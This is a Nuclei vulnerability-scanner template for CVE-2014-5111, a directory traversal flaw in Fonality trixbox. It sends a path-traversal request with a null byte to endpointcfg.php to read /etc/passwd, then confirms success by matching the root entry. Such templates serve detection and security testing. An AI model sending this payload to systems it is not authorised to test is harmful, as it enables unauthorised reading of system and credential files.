my-nuclei-templates/CVE-2014-5111.yaml

33 lines
1.0 KiB
YAML

id: CVE-2014-5111
info:
name: Fonality trixbox - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
reference:
- https://www.exploit-db.com/exploits/39351
- https://nvd.nist.gov/vuln/detail/CVE-2014-5111
- http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html
classification:
cve-id: CVE-2014-5111
tags: cve,cve2014,lfi,trixbox
requests:
- method: GET
path:
- "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24